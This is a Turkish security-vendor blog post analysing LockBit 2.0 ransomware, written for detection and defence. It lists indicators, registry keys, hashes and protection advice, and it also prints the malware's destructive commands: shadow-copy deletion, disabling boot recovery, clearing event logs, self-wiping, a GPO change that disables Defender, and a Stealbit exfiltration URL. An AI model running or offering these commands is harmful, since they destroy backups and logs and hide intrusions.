Barikat Siber Güvenlik Logo

Lockbit Ransomware

Lockbit Ransomware | Barikat Siber Güvenlik

Lockbit Ransomware

20/02/2022

2019 Eylül ayından beri görülen ve daha önce “.abcd” fidye yazılımı olarak bilinen saldırının son varyantı Lockbit ransomware (2.0)’dır. Hedef ağ üzerine sızıldıktan sonra mimikatz gibi açık kod kaynaklı araçları kullanarak yetki yükseltme yapar. Daha sonrasında hedef sistem üzerinde şifreleme yaparak bir fidye notu bırakır.


LockBit 2.0 Wallpaper

Başlangıç Erişimi (Initial Access)

Fidye yazılımının karşıt ağ üzerinde çalışabilmesi için hedef sisteme sızması gerekir. Bu sızma fiziksel veya web üzerinden olabilir. Phishing, Web’e açık uygulama ihlalleri, Zero-Day, zayıf parola, ifşa edilmiş RDP, VPN bilgileri veya bu protokollere yapılan Brute-Force saldırıları fidye yazılımının hedef ağa bulaşmasına sebebiyet verebilir.

Bulaşma (Infection)

Zararlı yazılım kullanıcı dil bilgilerini kontrol ederek sisteme zarar verme konusunda karar verir, Eğer dil bilgileri Doğu Avrupa olarak algılanırsa fidye yazılımı sisteme bulaşmadan çıkış sağlar. Dil bilgileri yazılım filtresi ile eşleşmez ise, gerekli çözümleyicilerin kontrolünü sağlar, eğer yetki yeterli değilse mimikatz gibi araçlarla yetki yükseltmesi (privilege escalation) gerçekleştirir. Daha sonrasında verilerin tekrar kurtarılmasının engellemek adına sistem üzerinden Shadow-Copy’lerini siler. Sistem, host konfigürasyon, uzak paylaşım ve depolama cihazlarının bilgilerini sıralar ve temel işletim sistemi fonksiyonlarını hariç tutarak şifreleme işlemine başlar. Lockbit sızılan ağı hiç bir insan müdalesi gerekmeden şifreleyebilir, sistem üzerinde kendisini kopyalayabilir ve SMB, RDP protokollerini kullanarak lateral movement gerçekleştirebilir. Daha sonrasında dışarı veri çıkarmak için genellikle Stealbit uygulamasını kullanarak HTTP üzerinden dışarı veri çıkarır. Bu aşamada saldırgan, Rclone veya MEGAsync uygulamalarını da kullanabilir.

Lockbit’in çok tehlikeli olmasının sebeplerinden biri de şifreleme hızının fazla olmasıdır. AES (simetrik) şifreleme kullanarak sistemi hızlı bir şekilde şifreler.


LockBit 2.0 Wallpaper

Saldırı Belirteçleri (Indicators- IOC)

Dil Belirteçleri

Fidye yazılımının dil filtresi için kullandığı kodları ve filtreleri aşağıdaki gibidir.


LockBit 2.0 Wallpaper

Liste görünümü:


LockBit 2.0 Wallpaper

Liste kontrolü gerçekleştirerek , kullanıcı dili Doğu Avrupa Ülkesi ise sistemden çıkar.


LockBit 2.0 Wallpaper

LockBit 2.0 Wallpaper

Poweshell Komutları

Fidye yazılımının sistem üzerinde çalışması süresince powershell hareketleri aşağıdaki gibidir.

  • cmd.exe /c vssadmin Delete Shadows /All /Quiet
    Veri kurtarmasını engellemek için shadow-copy’leri siler.
  • cmd.exe /c bcdedit /set {default} recoveryenabled No
    Veri kurtarmasını engellemek için Win10 kurtarmasını etkisizleştirir.
  • cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
    Boot hatalarını yok sayar.
  • cmd.exe /c wevtutil cl security
    Güvenlik log’larını siler.
  • cmd.exe /c wevtutil cl system
    Sistem log’larını siler.
  • cmd.exe /c wevtutil cl application
    Uygulama log’larını siler.
  • cmd.exe "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 >Nul&fsutil file setZeroData offset=0 length=524288 "C:\Users\fred\Desktop\Lsystem-234-bit.exe" & Del /f /q "C:\Users\fred\Desktop\Lsystem-234-bit.exe"
    Kendisini sistem üzerinden siler.
  • cmd.exe "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
    Sistemdedki tüm shadow-copy’leri siler.
  • Registery Keys

  • UAC ( User Account Control)
    Key:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\ICM\Calibration
    Data:< Lockbit 2.0 Ransomware path >
  • LockBit 2.0 Walpaper Change
    Key:HKEY_CLASSES_ROOT\Lockbit\shell\Open\Command
    Data:"C:\Windows\system32\mshta.exe" "C:\Users\\Desktop\LockBit_Ransomware.hta"
    Key:HKEY_CLASSES_ROOT\Lockbit\DefaultIcon
    Data:C:\Windows\< First 6 characters of LockBit 2.0 Decrytion ID >.ico
  • Kalıcılık (Persistance)
    Key:HKEY_CURENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\{GUID}
    Data:C:\Useres\< username >\Destktop\Lockbit_Ransomware.hta
    Data:< Lockbit 2.0 Ransomware path >
  • Şifreleme (Encrytion)
    Key:HKEY_CURRENT_USER\Software\< LockBit2.0ID >\Private
    Key:HKEY_CURRENT_USER\Software\< LockBit2.0ID >\Public
    Lockbit 2.0 İkon Lokasyonu:HKEY_LOCAL_MACHINE\Software\Classes\.lockbit\DefaultIcon
  • Masa Üstü Modifikasyonları (Destktop Modification)
    Key:HKEY_CURRENT_USER\Control Panel\Desktop
    String Value:%APPDATA%\Local\Temp\.tmp.bmp
    String Value:TitleWalpaper = 0
    String Value:WalpaperStyle = 2
  • Oluşturulan Dosya ve Uzantıları
    C:\Users\< username >\Desktop\LockBit_Ransomware.hta (LockBit 2.0 hta file)
    C:\Windows\< username >\Appdata\Local\Temp\< LockBit 2.0 Walpaper >.tmp.bmp (Lockbit 2.0 Wallpaper)
  • GPO Güncellemeleri ile Windows Defender’ı Etkisiz Bırakmak
    [General]
    Versions= %s
    DisplayName=%s
    [Software\Policies\Microsoft\Windows Defender;DisableAntiSpyware]
    [ Software\Policies\Microsoft\Windows Defender\ Real-Time Protection;DisableRealTimeMonitoring]
    [ Software\Policies\Microsoft\Windows Defender\Spynet;SubmitSamplesConsent]
    [ Software\Policies\Microsoft\Windows Defender\Threats;Threats_ThreatsSeverityDefaultAction]
    [ Software\Policies\Microsoft\Windows Defender\UX Configuration;Notification_Suppress]
  • Poweshell Komutu ( Force GPO Policy)
    powershell.exe -Command “Get-ADComputer -filter * -Searchbase ‘%s’ | foreach{ InvokeGPUpdate -computer $_.name -force -RandomDelayInMinutes 0}”
  • Anti-Recovery Komutu
    C:\Windows\System32\cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
  • Dosya Uzantısı
    .lockbit
  • Lockbit 2.0 Fidye Notu
    Restore-My-Files.txt
  • Şifreleme ve Veri Çalma (Encryption and Data Exfiltration) - Stealbit

    Stealbit veri çalınmasını sağlayan yüksek derecede obfuscated bir uygulamadır. Verileri sızdırma etkinlik verimliliğini en üst düzeye çıkarmak için Microsoft input/output (I/O) modelini uygular. Veri sızdırma işlemi ne kadar hızlı ve etkinliği yüksek olursa tespit edilme şansıda bu etkenle orantılı olarak düşer.


    LockBit 2.0 Wallpaper

    Stealbit Sistem üzerinde bitwise operasyonlar kullanarak gerekli string ve modülleri yükler. Veri çıkarmak için bağlantı kurulan IP adresleri ECX registeri içerisinde sayılan değer ile mantıksal “and” operasyonunu kullanarak şifreler.

    Key: 0xF8 0x72 0x12 0x13 0xA6 0x25 0x3C 0xE3 0xF9 0x91 0x2E 0x18 0x20 0x22 0x76

    Encode Edilerek Gömülen IP Adresleri


    LockBit 2.0 Wallpaper

    Örnek String Encode Ve Decode Rutini


    LockBit 2.0 Wallpaper

    Decode Edilen IP Adres Listeleri


    LockBit 2.0 Wallpaper

    Runtime Süresi Boyunce Decode İşleminin Gerçekletirilmesi


    LockBit 2.0 Wallpaper

    Stelabit URL Örneği

    hxxp://185.182.193.120/06599379103BD9028AB56AE0EBED457D0

    Ağ Belirteci

    Host komuta kontrol sunucusu ile iletişimi kurduğunda HTTP protkolü çerçevesince PUT metodu ile 32-33 uzunluğundaki bir hexadecimal ile sunucuya istek atar. Örnek olarak :

  • PUT /06599379103BD9028AB56AE0EBED457D0 HTTP/1.1.
  • Kendini Silme Komutu

  • ping 127.0.0.7 –n 7 > Nul & fsutil file setZeroData offset=0 length=< Stealbit file path > & Del /f /q
  • Hash Kayıtları

      MD5 SHA-1 SHA-256
      af9ff037caca1f316e7d05db86dbd882 844e9b219aaecb26de4994a259f822500fb75ae1 f3e891a2a39dd948cd85e1c8335a83e640d0987dbd48c16001a02f6b7c1733ae
      4d25a9242eac26b2240336fb94d62b1e c7b2d4a22f788b1b942f993fff33f233dca960ce f32e9fb8b1ea73f0a71f3edaebb7f2b242e72d2a4826d6b2744ad3d830671202
      b7f1120bcff47ab77e74e387805feabe a185904a46b0cb87d38057fc591a31e6063cdd95 4de287e0b05e138ab942d71d1d4d2ad5fb7d46a336a446f619091bdace4f2d0a
      84866fca8a5ceb187bca8e257e4f875a 038bc02c0997770a1e764d0203303ef8fcad11fb acad2d9b291b5a9662aa1469f96995dc547a45e391af9c7fa24f5921b0128b2c
      f91095ae0e0632b0f630e0c4eb12ba10 6c4040f2a76e61c649e1ff4ac564a5951c15d1fa 717585e9605ac2a971b7c7537e6e311bab9db02ecc6451e0efada9b2ff38b474
      6fc418ce9b5306b4fd97f815cc9830e5 95838a8beb04cfe6f1ded5ecbd00bf6cf97cd564 0545f842ca2eb77bcac0fd17d6d0a8c607d7dbc8669709f3096e5c1828e1c049
      b0916724ff4118bf213e31cd198c0afd 12ac32d012e818c78d6db790f6e11838ca75db88 4bb152c96ba9e25f293bbc03c607918a4452231087053a8cb1a8accb1acc92fd
      66b9ccb41b135f302b3143a5d53f4842 3d532697163e7c33c7c906e8efbb08282d3efd75 d089d57b8b2b32ee9816338e96680127babc5d08a03150740a8459c29ab3ba78

    MITRE ATT&CK MATRİSİ


    LockBit 2.0 Wallpaper

    Etkilenen Sistemler

    Aşağıdaki sistemin etkilendiği belirtilmiştir;

  • Windows İşletim Sistemi
  • Önerilen Korunma Yöntemleri

  • Olası sisteme fidye yazılımı sızması durumuna karşılık , güvenilir bölgede çevrimdışı veri yedeklemesi yapılması gerekir.
  • Tüm hesaplara erişimin parola ile sağlanması ve parolaların güçlü olması, özellikle yetkili ve admin hesapları için özel bir parola politikası uygulanarak şifrelerin benzersizleştirilmesi gereklidir.
  • Mail, VPN ve benzeri kritik sistemlere erişim sağlanırken Multi-factor authentication kullanılmaldır.
  • İşletim Sistemi ve kullanılan Yazılımlar güncel olmalıdır.
  • Gereksiz olan admin paylaşımları kaldırılmalı yada yetki azaltılması uygulanmalıdır.
  • Host tabanlı güvenlik duvarı kullanılarak sadece belli miktar admin hesapları için SMB trafiklerine izin verilmelidir.
  • Windows üzerinde dosya koruma özelliğini aktifleştirerek kritik dosyalarda yetkisiz değişim yapılmasının engellenmesi sağlanmalıdır.
  • Mevcut ağı alt ağlara bölerek fidye yazılımının yayılması durdurabilir.
  • Potansiyel olarak ağ içerisinde yayılan zararlı yazılımı engellemek için EDR kullanarak anomolileri kimlenlendirmek, tespit etmek ve incelemek etkili bir çözümdür.
  • Sosyal Medyada Paylaş